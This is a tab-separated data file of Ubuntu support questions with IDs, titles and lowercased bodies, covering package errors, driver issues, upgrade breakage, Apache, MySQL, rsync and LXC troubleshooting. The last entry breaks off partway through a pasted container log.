368449	libc-bin errors when trying to install php	i am trying to update and install php into my ubuntu server 12.04 using the command below : apt-get upgrade php apt-get install php5-curl php5-gd php5-mysql php5-pgsql however i receive this error all the time : gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-34-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.2.0-34-generic.postinst line 1010. dpkg : error processing linux-image-3.2.0-34-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-server : linux-image-server depends on linux-image-3.2.0-33-generic ; however : package linux-image-3.2.0-33-generic is not configured yet . dpkg : error processing linux-image-server ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.33.36 ) ; however : package linux-image-server is not configured yet . dpkg : error processing linux-server ( -- configure ) : dependency problems - leaving unconfigured setting up libpq5 ( 9.1.10-0ubuntu12.04 ) ... no apport report written because the error message indicates it 's a follow-up error from a previous failure . no apport report written because maxreports has already been reached setting up php5-curl ( 5.3.10-1ubuntu3.8 ) ... setting up php5-pgsql ( 5.3.10-1ubuntu3.8 ) ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-32-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-32-generic with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports has already been reached processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : linux-image-3.2.0-33-generic linux-image-3.2.0-34-generic linux-image-server linux-server initramfs-tools e : sub-process /usr/bin/dpkg returned an error code ( 1 ) not sure whats wrong and why it cant process the linux-image files ?
368450	still ca n't use usb in virtualbox after extension install in ubuntu 13.04	i 've downloaded the latest virtualbox 4.3 for ubuntu 13.04 . and i 've downloaded the latest version of the extension pack for this version , intended to enable the use of usb on a guest operating system . my guest os is windows xp . when i go to settings to install/pickup a usb device before opening xp , virtual box does n't pickup any usb device , does n't matter which port i use . what can i do further ? before version 4.3 , i had 4.2 . i completely removed it and started over . then i downloaded the latest version 4.3 and the extension pack in the hope that it would resolve my previous usb issue , but with no success . please assist .
368452	how to remove the double header for wine applications	i do n't know how they are called , but when i open a wine application i see two top bars ( those with the close/minimize/resize buttons ) like that : is there a way to disable this behaviour and keep just the upper one ?
368454	open specific website at startup	in windows it is possible to add a policy so that a specific website will open every time a user logs in . is this possible in ubuntu also ?
368456	running slow ubuntu 13.10 unity	firstly i know , that this question is here many times . but i 've already read and tried about 5 best rated answers . result was that system crashed and i wasnt able to run it or do something so i just re-installed that . or it just did n't help . i 'm newbie to ubuntu and linux at all . i 've hp probook 4530s with intel core i5 2nd generation . 8gb ram . switchable graphics amd radeon 6490m and intel 520 ssd on which i 've installed ubuntu . it 's really laggy and i already tried search for additional drivers as answered on some question here . but it did n't help . in system monitor i can see that cpu is in normal line not so much used . but my battery which normally can keep notebook alive about 6 hours now show me just 1 hour . and also fan is running so i suppose that something must drain performance . i do n't need super extra performance but i 'd like to have my 6 hours on battery and be able to use some apps for my work swiftly ( netbeans ide , phpstorm and similar ) . thanks for your answers
368458	pulseaudio module playback stutters depending on player used to playback	i wrote a pulseaudio module that expects 32 bit floating point samples pa_sample_float32le . when i playback a file using totam movie player , youtube ... , the sound stutters . when i playback using vlc , there are n't any stutters . if i look at list-sink-inputs with the totem movie player i see : current latency : 105.94 ms requested latency : 90.00 ms sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo resample method : copy with vlc : current latency : 385.77 ms requested latency : 13.33 ms sample spec : s16le 2ch 44233hz channel map : front-left , front-right stereo resample method : speex-float-0 i see that vlc uses the resample method specified in daemon.conf whereas totam movie player does not . my module receives twice as many packets with totam movie player . how do i get it to play without stuttering ? thanks .
368463	ubuntu 12.10 acer aspire s7 fatal error bluetooth	hello ubuntu forum friends i have a problem with my new ultrabook ( acer aspire s7 ) after installing ubuntu 12.10 everything works great , except the bluetooth driver for my wireless ( acer ) mouse . when i use my keypad in combination with the bluetooth i get a fatal error ountall disconnected from plymouth bug : unable to handle kernel null pointer dereference at modules linked in : hidp bluetooth cfg80211 help appreciated
368465	no wallpaper in ubuntu 13.10	hi there wonderful people ! i just updated my ubuntu from 13.04 to 13.10 , and my desktop has turned black ! no wallpaper for me.in the `` appearance '' i am able to see all the wallpapers , but am not able to set them on the desktop ! please help ... thanks..
368466	0 a.d game with alpha 14 like developing versions	i have installed o a.d game using ubuntu universe repository . but www.play0ad.com reports there are development releases ( but not stable ) can install using develpment repository . so i added development repository ppa : wfg/0ad.dev then i update the system but terminal says following error w : failed to fetch http : //ppa.launchpad.net/wfg/0ad.dev/ubuntu/dists/precise/release unable to find expected entry 'precise/source/sources ' in release file ( wrong sources.list entry or malformed file ) please help me to resolve this problem.thank you !
368468	unwanted authentication request window at login after upgrade to ubuntu 13.10	i recently upgraded to ubuntu 13.10 ( 64bit ) on my dell laptop . since then , at each login , a dialog window entitled `` authentication request ... please enter the password for account `` ... @ gmail.com '' . '' appears ( i would rather post a screenshot if i could , but i am not entitled to do that because i do not have the necessary 10 reputation credits ) . i neither have any idea why my password ( i checked it a hundred times ) does not work ( `` password was incorrect '' ) nor why this dialog is displayed at all . as said , i never saw it before 13.10 . i looked around in different forums and it seems ( please correct me if i am wrong ) that it stems from evolution server . i also deleted ~/.config/evolution/ entirely - without any effect . further note that i am not using evolution at all and i would rather like to get rid of it completely , but i do not dare to remove evolution-server . any ideas ? thanks in advance , ulrich
368469	ecryptfs does not bring up keyboard at boot !	i installed 13.10 amd64 and chose to encrypt my entire system . when i rebooted , the prompt to enter my passphrase to decrypt the hdd came up , but it was impossible to enter because my keyboard had not been activated . any ideas on how to correct this misbehavior ?
368470	shift and alt key ?	in windows is shift+alt to change keyboard ( example- english to slovak ) . is in ubuntu it ? and where ?
368472	tomcat7 's catalina_home in debian/ubuntu	where is tomcat7 's catalina_home in debian/ubuntu , and more importantly how did you find it ? i 'm ok with debian rearranging default software installations , but we must be able to find out where basic resources have been moved . is there any easy-to-find readme or config file in the tomcat7 installation that has this vital info ?
368473	wubi install was fine . weeks later , i can not boot into ubuntu . can i now try to boot via disk or usb and still have access to my files ?	i installed ubuntu using wubi a few months ago . some weeks later , i started having slow boot ups and then , last night , complete inability to boot . however , windows is working just fine . i was getting errors that i had no disk space left which is not true . if i try a boot into ubuntu and let it hang on the purple screen with ubuntu logo and dots for an hour or more , i will eventually see something about an error with the video card ( i have an nvidea ) . here is my question : if i set up a cd or usb to boot from , will i be able to access my files and run my software or am i pretty much going to see an empty home drive ? in order words , have i lost everything i had ? i spent a ridiculous amount of time getting a piece of custom scientific software to install which has been around for years and runs stably within linux os systems . i do n't want to have to start all over again if possible .
368476	i had an older version of ubuntu ( possibly 12.04 or newer ) but the 13.10 upgrade crashed !	after all the files were downloaded and the install about 1/2 way , i noted error messages and then finally the install froze . i tried rebooting but my os is damaged . i downloaded the iso for 12.04 and 13.10 ( download in progress now ) . can i re-install 12.04 without losing my programs and data or should i try 13.10 when my iso downloads ? how can i best recover my system ? thanks , joe
368477	everpad not syncing - ubuntu 13.10	i have installed everpad ( nvbn-rm 2.5.6-0~saucy ) but can not sync with an existing an evernote account . i have also tried creating a new account on evernote however create/sync notes do not work . i have logged out and back in but to no avail .
368479	error : broken count > 0 help ? ca n't download anything from software center.. ubuntu 12.04 lts	it says an error occured , please run package manager from right click menu or aptget in a terminal to see what is wrong . the error message was 'error : broken count > 0 ' this usually means that your installed packages have unmet dependencies . last night i have been desperately trying to install skype and flash players but failed.. is there anything i can do ?
368484	keyboard locale indicator shows en-us even though i set it to be pt-bt	i am having an issue with my keyboard . my keyboard is pt-br layout , and i set on the configurations to be pt-br by default . but when i login on my system , it is set on en-us , but the applet shows pt-br . so i have to click the applet and click pt-br to it be set . i have no other language installed on my system , just pt-br . what could it be ? thank you . ps . this started happening a little time ago . when i installed saucy everything was going ok , but from a week to now this issue appeared .
368485	how to open windows shared folder	i am running ubuntu 13.04 . i want to open a shared folder in other window pc , with ip address like 192.168.11.10 , where a shared document is located . doing it from brows network shows error .
368486	kernel resetting sata link	on current ( k ) ubuntu saucy i see occasionally on my lenovo thinkpad t520 with dmesg : [ 23391.818508 ] ata4 : exception emask 0x10 sact 0x0 serr 0x4040000 action 0xe frozen [ 23391.818513 ] ata4 : irq_stat 0x00000040 , connection status changed [ 23391.818516 ] ata4 : serror : { commwake devexch } [ 23391.818523 ] ata4 : limiting sata link speed to 1.5 gbps [ 23391.818525 ] ata4 : hard resetting link [ 23392.538993 ] ata4 : sata link down ( sstatus 0 scontrol 310 ) [ 23392.554893 ] ata4 : eh complete i observe this when kde freezes temporarily . there is an askubuntu topic here is a disk/ata timeout exception dangerous ? which refers to the bug https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/539467 . but it did not bring a solution . my smart data seems to be alright ( except for airflow_temperature_cel ) events . another topic mysterious hard disk failure ? was marked as solved but was n't actually solved . there is an older but very similar message here : https : //lkml.org/lkml/2011/10/27/1 . the notebook model is the same as mine , and also kde lags are reported . i am undecided if and where i should report this as a bug .
368487	change kde logos in all icons for custom distro	we are making a ubuntu-derivative distro . we have chosen kde for the de , want to know how to customize all the logos and icons of kde to match our distro logos .
368490	user missing from login , but can log in via ssh	i recently installed webmin , which may be the root of the problem , i do not know . regardless , there must be some ubuntu-specific means of solving my issue . the issue right now is that i am unable to login to my desktop computer because my username is not available in the login screen . however , i am able to login to the machine via ssh from another computer , so the user still exists ... . somewhere ? note that this is not a new user account : this is one that far predates webmin and has always been my primary administrative account . thank you for your assistence
368491	can not run ubuntu ( touch ) facebook app	as said in the title , i 'm not able to run and try facebook app , such as it happens in the reported ( not by me ) bug # 1226770 https : //bugs.launchpad.net/ubuntu-facebook-app/+bug/1226770 the application seems to be slowly developed , in fact it has n't been upgraded for a while . as described in the bug , it affects youtube and twitter too . is that a real bug or what ? i followed instructions of libraries to install but it was useless . the error is still : /ubuntu-facebook-app/ubuntu-facebook-app.qml:74 toolbaractions is not a type what can i do to make it work ?
368497	modify theme colors gtk 3.0 gnome fallback in ubuntu 12.10	i would like to know how to modify colors of top bar and left bar ( please tell me even name of this things becuase i 'm not english man ) http : //th04.deviantart.net/fs71/pre/i/2011/322/8/2/light_themes_evolved_by_simplygreat-d3golt2.png i use ubuntu 12.10 in fallback mode thank to all of you , friends roby
368505	setup rsync to delete files from my remote server once they have been successfully transfered to my local machine	i need help setting up rsync to transfer files from my remote server to my local machine and then delete the files form the remote server once they have been moved successfully to the local machine . i am currently using the following combination which does the job of copying from remote to local fine , but does n't delete as i would like . rsync -avvru -- delete-excluded /remote/location /local/location each box has rsync installed , and the above command is being run from the remote server pushing to the local machine
368506	can you install/ uninstall ubuntu packages too many times ?	a question i would like to ask is : what happens if i uninstall/install a package too many times in ubuntu ? for example ejabberd .
368507	are qt quick controls available on ubuntu 13.10 ?	i was looking to do ui development in qml , and i really want it to look native . i found the qtquick.controls ( http : //qt-project.org/doc/qt-5.1/qtquickcontrols/qtquickcontrols-index.html ) , but when i try make a simple application , it tells me that qtquick.controls is n't installed . main.qml : import qtquick 2.1 import qtquick.controls 1.0 rectangle { height : 200 width : 200 } terminal : $ qmlscene main.qml file : ///tmp/main.qml:2 module `` qtquick.controls '' is not installed also , i downloaded the source from https : //qt.gitorious.org/qt/qtquickcontrols/source/stable , ran qmake & & make , but this returned the following output : cd src/ & & ( test -e makefile || /usr/lib/i386-linux-gnu/qt5/bin/qmake /tmp/qtquickcontrols/src/src.pro -o makefile ) & & make -f makefile make [ 1 ] : g책r til katalog '/tmp/qtquickcontrols/src' cd controls/ & & ( test -e makefile || /usr/lib/i386-linux-gnu/qt5/bin/qmake /tmp/qtquickcontrols/src/controls/controls.pro -o makefile ) & & make -f makefile make [ 2 ] : g책r til katalog '/tmp/qtquickcontrols/src/controls' g++ -c -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -werror=format-security -d_fortify_source=2 -o2 -fvisibility=hidden -fvisibility-inlines-hidden -std=c++0x -fno-exceptions -wall -w -d_reentrant -fpic -dqt_no_xkb -dqt_no_exceptions -d_largefile64_source -d_largefile_source -dqt_no_debug -dqt_plugin -dqt_quick_lib -dqt_qml_lib -dqt_widgets_lib -dqt_network_lib -dqt_gui_lib -dqt_core_lib -i/usr/share/qt5/mkspecs/linux-g++ -i . -i/usr/include/qt5 -i/usr/include/qt5/qtquick -i/usr/include/qt5/qtqml -i/usr/include/qt5/qtwidgets -i/usr/include/qt5/qtnetwork -i/usr/include/qt5/qtgui -i/usr/include/qt5/qtgui/5.1.1 -i/usr/include/qt5/qtgui/5.1.1/qtgui -i/usr/include/qt5/qtcore -i/usr/include/qt5/qtcore/5.1.1 -i/usr/include/qt5/qtcore/5.1.1/qtcore -i.moc/release-shared -o .obj/release-shared/qquickaction.o qquickaction.cpp qquickaction.cpp:49:39 : fatal error : private/qguiapplication_p.h : no such file or directory # include < private/qguiapplication_p.h > ^ is there some ppa i could use , or do i have to wait for trusty to get out , before i can use native controls from qt ? regards
368509	why is $ 0 set to -bash ?	first login process name seems to be set to -bash , but if i subshell then it becomes bash . for example : root @ nowere : ~ # echo $ 0 -bash root @ nowere : ~ # bash root @ nowere : ~ # echo $ 0 bash -bash is causing some scripts to fail , such as . /usr/share/debconf/confmodule exec /usr/share/debconf/frontend -bash ca n't exec `` -bash '' : no such file or directory at /usr/share/perl/5.14/ipc/open3.pm line 186. open2 : exec of -bash failed at /usr/share/perl5/debconf/confmodule.pm line 59 anyone know the reason why $ 0 is set to -bash ?
368513	can i run ubuntu from a from a pen drive ?	i was thinking if i can run ubuntu from a pen drive , like rather than have it run from a cd would it be possible to run it from a pen drive ...
368514	can not open display under superuser	i am running ubuntu 12.04 under virtualbox . everytime i try to open a graphical application from the terminal as superuser , i get an error : user : ~ $ sudo gedit can not open display : run 'gedit -- help ' to see a full list of available command line options . user : ~ $ sudo kate qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . kate : can not connect to x server user : ~ $ sudo java ajavadesktopapplication exception in thread `` main '' java.lang.exceptionininitializererror at ... caused by : java.awt.headlessexception : no x11 display variable was set , but this program performed an operation which requires it . at java.awt.graphicsenvironment.checkheadless ( graphicsenvironment.java:207 ) at java.awt.window. < init > ( window.java:535 ) at java.awt.frame. < init > ( frame.java:420 ) at java.awt.frame. < init > ( frame.java:385 ) at javax.swing.jframe. < init > ( jframe.java:180 ) however , when i open it normally , it works just fine . any ideas ? gsuko does n't change this behaviour either
368515	upgraded to ubuntu 13.10 - apache not able to start	i updated to ubuntu 13.10 ( from ubuntu 13.04 ) last weekend , and now apache is not being able to start . it was working perfectly well until the upgraded , and i have n't changed anything myself . when i ran a restart this is what i get apache2 : syntax error on line 260 of /etc/apache2/apache2.conf : could not open configuration file /etc/apache2/conf.d/ : no such file or directory so , i created the directory , and then i get this : * starting web server apache2 * * the apache2 configtest failed . output of config test was : [ wed oct 30 11:17:42.921934 2013 ] [ proxy_html : notice ] [ pid 2496 ] ah01425 : i18n support in mod_proxy_html requires mod_xml2enc . without it , non-ascii characters in proxied pages are likely to display incorrectly . ah00526 : syntax error on line 84 of /etc/apache2/apache2.conf : invalid command 'lockfile ' , perhaps misspelled or defined by a module not included in the server configuration action 'configtest ' failed . the apache error log may have more information . thanks !
368516	accessing sudo from a non-administrator profile	i have had ubuntu for a few months by now , and i have set up an administrator profile and a 'normal ' account , which i use for everyday work . sometimes i need the admin profile , e.g . to install programs . this means that i have to switch profiles , execute whatever commands i need with sudo through the admin profile and then go back to work . this is rather uncomfortable , as sometimes i have got open web pages with the instructions of what i have to do on my work profile . is there a way to use sudo with admin username/password while i am still logged in as 'work ' ? are there any other alternatives ?
368518	how to install cedarview driver in kubuntu 12.04 lts ?	i am running kubuntu 12.04 lts on asus 1225 which uses a cedarview intel graphics . i 've found documentation online explaining the following steps : activate multiverse repositories sudo apt-get -y update sudo apt-get -y install cedarview-drm libva-cedarview-vaapi-driver cedarview-graphics-drivers ... after installation at next reboot i 'm stuck with a black screen . i 'm following no guide , just trying to install cedarview drivers on kubuntu 12.04 lts because the computer have a intel cedar grahic card and i need the acceleration of the graphic card . please note i ran some tests with mint ( latest release ) and mint recognize the graphic card without me having nothing to do . thanks in advance .
368520	unity - use tab key to naviagate the hud list	right now , if we want to navigate the entries in the hud results , the only way is to use the arrow keys . is it possible to somehow map the tab key to navigate the results ?
368526	turn off mysql -- skip-grant -tables	i reset my root mysql password with the following instructions : ( works for ubuntu as well ) http : //www.debian-administration.org/articles/442 but now i ca n't turn off mysqld_safe -- skip-grant-tables . when i run fg i have : sudo /usr/bin/mysqld_safe -- skip-grant-tables how can i kill this and start mysql securely ?
368534	ubuntu 13.10 freezes on purple screen when restart only	i have a 24inch early 2009 imac with triple boot ( mac , windows 7 , linux ) , ubuntu was the last one i installed , everything is running fine on all 3 systems except when i restart with ubuntu , it does n't shutdown and then restart , instead it freezes on purple screen after `` restarting system '' message . i 've tried many many solutions , such as changing grub settings like grub_cmdline_linux= '' reboot=efi/bios etc '' , grub_cmdline_linux_default to something else , installing my current graphics card driver etc.. again , everything else works fine , shutdown works fine , only restart freezes on a purple screen and i have to do a hard shutdown , any solution is appreciated , thanks in advance .
368535	ubuntu 13.10 software center authentication error and okular can not find component	i had installed 'okular ' but after the upgrade it gives error saying component not found . thus i tried removing and installing again . but the software center gave following error . software ca n't be installed or removed because the authentication service is not available . ( org.freedesktop.policykit.error.failed : ( 'system-bus-name ' , { 'name ' : ':1.74 ' } ) : org.debian.apt.install-or-remove-packages i used sudo and reinstalled okular again . but still for okular the same problem persists . some help would be appreciated .
368536	new computer , 2 ssds , 1 windows 7 , other ubuntu . ntk ?	if i am installing ubuntu now , will i be able to install another linux on the same drive without problems ? can i access programs , files installed on ubuntu etc ? reading about the install process and root/home/swap partitions has me a bit confused as it is , and i 'm more focused on making sure ubuntu does n't cause a premature death to my ssd . ubuntu is free , ssds are not .
368539	intel turboboost not working under 12.04 lts	please help me someone : ) my notebook has intel core i5 3337u cpu with intel turbo boost . under 12.04 the turbo boost is not working properly . it 's frequency maximum is 1.8ghz but the cpu can run 2.7ghz . how can i fix it ? pano @ dell-inspiron : ~ $ grep mhz /proc/cpuinfo cpu mhz : 774.000 cpu mhz : 1801.000 cpu mhz : 774.000 cpu mhz : 1801.000 pano @ dell-inspiron : ~ $ grep mhz /proc/cpuinfo cpu mhz : 774.000 cpu mhz : 1801.000 cpu mhz : 774.000 cpu mhz : 1801.000 pano @ dell-inspiron : ~ $ grep mhz /proc/cpuinfo cpu mhz : 774.000 cpu mhz : 1801.000 cpu mhz : 1800.000 cpu mhz : 1801.000 pano @ dell-inspiron : ~ $ grep mhz /proc/cpuinfo cpu mhz : 774.000 cpu mhz : 1801.000 cpu mhz : 774.000 cpu mhz : 1700.000
368540	installing ubuntu on acer a100 and motorola atrix 2 me865	is there a way how to install on ubuntu on these devices ? acer a100 motorola atrix 2 me865 i 've watched the video of the google nexus running on ubuntu and it really looks great .
368541	laggy graphics after upgrade to ubuntu 13.10	i noticed some issues concerning the graphics after i upgraded from ubuntu 13.04 to 13.10 . more specifically : dash tends to be more `` laggy '' than it used to be . when i switch desktops you can clearly see the screen going frame by frame . menu bar is also `` laggy '' . when i open gimp , the menu bar is useless after a while - it takes seconds to refresh . the problems seem to appear after some seconds of use . when i boot the system everything works fine , until some more graphics-intensive program starts ( firefox , gimp , etc ) . /usr/lib/nux/unity_support_test -p reports : opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) ivybridge mobile opengl version string : 3.0 mesa 9.2.1 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes i use an asus zenbook ux31a with : intel速 core i5 ivy bridge integrated intel速 hd graphics 4000 intel速 hm76 express chipset thank you in advance for any answer !
368545	wifi not working after installing desktop on server 13.10	i installed server 13.10 with lamp successfully , including a working wifi connection . for self-education purposes i installed ubuntu-desktop , apparently successfully . except that after restarting and the gui coming up , there is no sight of any wifi destinations . using the network management tool i put in the ssid and bssid and wpa password , but no connection is made to the wifi network ( the wifi hardware switch is on ) . running the hardware tool correctly identifies the intel 5100 for wifi , but no drivers are listed under additional drivers . is there a conflict with server ? how do i resolve this ? any ideas ? thank you
368546	usb not detecting in ubuntu but it 's getting detected in virtual machine ( windows )	usb pendrive is not getting detected in ubuntu os but it 's getting detected in virtual machine ( windows ) within same system . please help me .
368551	software to automatically download youtube videos	i 'm looking for ( free ) ubuntu youtube software that can perform two tasks ( could be separate software ) : display on screen notification ( like transmission does when a download has finished ) when a new video has been uploaded to your personal subscription box download videos in max quality ( preferably automatically once a new video has been uploaded from specific channels / series ) what i 've found so far : all video downloader : only downloads manually , ca n't select quality minitube : does n't associate with your personal account , does n't notify when new video has been uploaded from your subscriptions . annoying gui . quite buggy . if this software does n't exist yet , i 'll try to make it myself .
368552	lxc containers hangs after upgrade to 13.10	i have 3 lxc containers . they were all working fine on 12.10 and i upgraded the containers with do-release-upgrade on the containers to 13.04 and 13.10 and that worked great . then i upgraded the host to 13.04 and then 13.10 and now the 3 containers hang with this : update : everything i 've said is still true but lxc-ls shows the containers as running so they are running they are just stuck somewhere while trying to start up . the /var/log/syslog , kern.log and auth.log do n't get updated but wtmp and upstart do . some files in the /var/log/upstart directory have errors but not sure which one really matters . ah-ha ! > lxc-start -n as1 -l debug -o $ ( tty ) lxc-start 1383145786.513 info lxc_start_ui - using rcfile /var/lib/lxc/as1/config lxc-start 1383145786.513 warn lxc_log - lxc_log_init called with log already initialized lxc-start 1383145786.513 info lxc_apparmor - aa_enabled set to 1 lxc-start 1383145786.514 debug lxc_conf - allocated pty '/dev/pts/2 ' ( 5/6 ) lxc-start 1383145786.514 debug lxc_conf - allocated pty '/dev/pts/13 ' ( 7/8 ) lxc-start 1383145786.514 debug lxc_conf - allocated pty '/dev/pts/14 ' ( 9/10 ) lxc-start 1383145786.514 debug lxc_conf - allocated pty '/dev/pts/15 ' ( 11/12 ) lxc-start 1383145786.514 debug lxc_conf - allocated pty '/dev/pts/17 ' ( 13/14 ) lxc-start 1383145786.514 debug lxc_conf - allocated pty '/dev/pts/18 ' ( 15/16 ) lxc-start 1383145786.514 debug lxc_conf - allocated pty '/dev/pts/19 ' ( 17/18 ) lxc-start 1383145786.514 debug lxc_conf - allocated pty '/dev/pts/20 ' ( 19/20 ) lxc-start 1383145786.514 info lxc_conf - tty 's configured lxc-start 1383145786.514 debug lxc_start - sigchild handler set lxc-start 1383145786.514 debug lxc_console - opening /dev/tty for console peer lxc-start 1383145786.514 debug lxc_console - using '/dev/tty ' as console lxc-start 1383145786.514 debug lxc_console - 6242 got sigwinch fd 25 lxc-start 1383145786.514 debug lxc_console - set winsz dstfd:22 cols:177 rows:53 lxc-start 1383145786.514 info lxc_start - 'as1 ' is initialized lxc-start 1383145786.522 debug lxc_start - not dropping cap_sys_boot or watching utmp lxc-start 1383145786.524 debug lxc_conf - mac address of host interface 'vethb4l35w ' changed to private fe:7c:96 : a0 : ae:29 lxc-start 1383145786.525 debug lxc_conf - instanciated veth 'vethb4l35w/vethvc61k2 ' , index is '26' lxc-start 1383145786.529 debug lxc_cgroup - cgroup 'memory.limit_in_bytes ' set to '20g' lxc-start 1383145786.529 debug lxc_cgroup - cgroup 'cpuset.cpus ' set to '12-23' lxc-start 1383145786.529 info lxc_cgroup - cgroup has been setup lxc-start 1383145786.555 debug lxc_conf - move 'eth0 ' to '6249' lxc-start 1383145786.555 info lxc_conf - 'as1 ' hostname has been setup lxc-start 1383145786.575 debug lxc_conf - 'eth0 ' has been setup lxc-start 1383145786.575 info lxc_conf - network has been setup lxc-start 1383145786.575 info lxc_conf - looking at .44 42 252:0 / / rw , relatime - ext4 /dev/mapper/limitorderbook1-root rw , errors=remount-ro , data=ordered . lxc-start 1383145786.575 info lxc_conf - now p is . / . lxc-start 1383145786.575 info lxc_conf - looking at .52 44 0:5 / /dev rw , relatime - devtmpfs udev rw , size=32961632k , nr_inodes=8240408 , mode=755 . lxc-start 1383145786.575 info lxc_conf - now p is . /dev . lxc-start 1383145786.575 info lxc_conf - looking at .61 52 0:11 / /dev/pts rw , nosuid , noexec , relatime - devpts devpts rw , mode=600 , ptmxmode=000 . lxc-start 1383145786.575 info lxc_conf - now p is . /dev/pts . lxc-start 1383145786.575 info lxc_conf - looking at .68 44 0:15 / /run rw , nosuid , noexec , relatime - tmpfs tmpfs rw , size=6594456k , mode=755 . lxc-start 1383145786.575 info lxc_conf - now p is . /run . lxc-start 1383145786.575 info lxc_conf - looking at .69 68 0:18 / /run/lock rw , nosuid , nodev , noexec , relatime - tmpfs none rw , size=5120k . lxc-start 1383145786.575 info lxc_conf - now p is . /run/lock . lxc-start 1383145786.575 info lxc_conf - looking at .72 68 0:19 / /run/shm rw , nosuid , nodev , relatime - tmpfs none rw . lxc-start 1383145786.575 info lxc_conf - now p is . /run/shm . lxc-start 1383145786.575 info lxc_conf - looking at .73 68 0:21 / /run/user rw , nosuid , nodev , noexec , relatime - tmpfs none rw , size=102400k , mode=755 . lxc-start 1383145786.575 info lxc_conf - now p is . /run/user . lxc-start 1383145786.575 info lxc_conf - looking at .76 44 0:14 / /sys rw , nosuid , nodev , noexec , relatime - sysfs sysfs rw . lxc-start 1383145786.575 info lxc_conf - now p is . /sys . lxc-start 1383145786.575 info lxc_conf - looking at .77 76 0:16 / /sys/fs/cgroup rw , relatime - tmpfs none rw , size=4k , mode=755 . lxc-start 1383145786.575 info lxc_conf - now p is . /sys/fs/cgroup . lxc-start 1383145786.575 info lxc_conf - looking at .78 77 0:20 / /sys/fs/cgroup/cpuset rw , relatime - cgroup cgroup rw , cpuset , clone_children . lxc-start 1383145786.575 info lxc_conf - now p is . /sys/fs/cgroup/cpuset . lxc-start 1383145786.575 info lxc_conf - looking at .79 77 0:23 / /sys/fs/cgroup/cpu rw , relatime - cgroup cgroup rw , cpu . lxc-start 1383145786.575 info lxc_conf - now p is . /sys/fs/cgroup/cpu . lxc-start 1383145786.575 info lxc_conf - looking at .80 77 0:24 / /sys/fs/cgroup/cpuacct rw , relatime - cgroup cgroup rw , cpuacct . lxc-start 1383145786.575 info lxc_conf - now p is . /sys/fs/cgroup/cpuacct . lxc-start 1383145786.575 info lxc_conf - looking at .81 77 0:25 / /sys/fs/cgroup/memory rw , relatime - cgroup cgroup rw , memory . lxc-start 1383145786.575 info lxc_conf - now p is . /sys/fs/cgroup/memory . lxc-start 1383145786.575 info lxc_conf - looking at .82 77 0:26 / /sys/fs/cgroup/devices rw , relatime - cgroup cgroup rw , devices . lxc-start 1383145786.575 info lxc_conf - now p is . /sys/fs/cgroup/devices . lxc-start 1383145786.575 info lxc_conf - looking at .83 77 0:27 / /sys/fs/cgroup/freezer rw , relatime - cgroup cgroup rw , freezer . lxc-start 1383145786.575 info lxc_conf - now p is . /sys/fs/cgroup/freezer . lxc-start 1383145786.575 info lxc_conf - looking at .84 77 0:28 / /sys/fs/cgroup/blkio rw , relatime - cgroup cgroup rw , blkio . lxc-start 1383145786.575 info lxc_conf - now p is . /sys/fs/cgroup/blkio . lxc-start 1383145786.575 info lxc_conf - looking at .85 77 0:29 / /sys/fs/cgroup/perf_event rw , relatime - cgroup cgroup rw , perf_event . lxc-start 1383145786.575 info lxc_conf - now p is . /sys/fs/cgroup/perf_event . lxc-start 1383145786.575 info lxc_conf - looking at .94 77 0:30 / /sys/fs/cgroup/hugetlb rw , relatime - cgroup cgroup rw , hugetlb . lxc-start 1383145786.575 info lxc_conf - now p is . /sys/fs/cgroup/hugetlb . lxc-start 1383145786.575 info lxc_conf - looking at .95 77 0:31 / /sys/fs/cgroup/systemd rw , nosuid , nodev , noexec , relatime - cgroup systemd rw , name=systemd . lxc-start 1383145786.575 info lxc_conf - now p is . /sys/fs/cgroup/systemd . lxc-start 1383145786.575 info lxc_conf - looking at .96 76 0:17 / /sys/fs/fuse/connections rw , relatime - fusectl none rw . lxc-start 1383145786.575 info lxc_conf - now p is . /sys/fs/fuse/connections . lxc-start 1383145786.575 info lxc_conf - looking at .98 76 0:6 / /sys/kernel/debug rw , relatime - debugfs none rw . lxc-start 1383145786.575 info lxc_conf - now p is . /sys/kernel/debug . lxc-start 1383145786.575 info lxc_conf - looking at .101 76 0:10 / /sys/kernel/security rw , relatime - securityfs none rw . lxc-start 1383145786.575 info lxc_conf - now p is . /sys/kernel/security . lxc-start 1383145786.575 info lxc_conf - looking at .102 76 0:22 / /sys/fs/pstore rw , relatime - pstore none rw . lxc-start 1383145786.575 info lxc_conf - now p is . /sys/fs/pstore . lxc-start 1383145786.575 info lxc_conf - looking at .103 44 0:3 / /proc rw , nosuid , nodev , noexec , relatime - proc proc rw . lxc-start 1383145786.575 info lxc_conf - now p is . /proc . lxc-start 1383145786.575 info lxc_conf - looking at .104 44 9:2 / /data rw , relatime - ext4 /dev/md2 rw , errors=remount-ro , data=ordered . lxc-start 1383145786.575 info lxc_conf - now p is . /data . lxc-start 1383145786.575 info lxc_conf - looking at .105 44 8:1 / /boot rw , relatime - ext2 /dev/sda1 rw , errors=continue . lxc-start 1383145786.575 info lxc_conf - now p is . /boot . lxc-start 1383145786.576 debug lxc_conf - mounted '/data/srv/lxc/as1 ' on '/usr/lib/x86_64-linux-gnu/lxc' lxc-start 1383145786.576 debug lxc_conf - mounted 'none ' on 